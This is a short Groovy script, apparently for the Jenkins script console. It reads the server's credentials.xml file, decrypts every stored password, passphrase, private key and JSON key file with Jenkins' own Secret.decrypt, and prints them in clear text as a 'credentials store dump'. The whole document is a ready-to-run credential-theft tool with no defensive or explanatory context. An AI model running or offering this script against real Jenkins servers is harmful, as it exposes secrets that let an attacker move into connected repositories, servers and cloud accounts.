import hudson.util.Secret
def env = System.getenv()
String homedir = env['JENKINS_HOME']
String creds = new File(homedir + '/credentials.xml').text

def m = creds =~ /(<password>|<username>|<privateKey>|<secret>|<passphrase>|<jsonKeyFile>|<data>)(.+)(<\/)/;

println("Credentials store dump:\n")

matchCount = m.getCount()

i = 0
while (i < matchCount) {
  if (m[i][1] == "<username>") {
    println "username: " + m[i][2]
  }
  if (m[i][1] == "<password>") {
    println "password: " + hudson.util.Secret.decrypt(m[i][2]) + "\n"
  }
  if (m[i][1] == "<passphrase>") {
    println "passphrase: " + hudson.util.Secret.decrypt(m[i][2]) + "\n"
  }
  if (m[i][1] == "<privateKey>") {
    println "privatekey:\n" + hudson.util.Secret.decrypt(m[i][2]) + "\n"  
  }  
  if (m[i][1] == "<jsonKeyFile>") {
    String jsonFile = new File(m[i][2]).text
    println hudson.util.Secret.decrypt(jsonFile)
  }
  i = i + 1
}
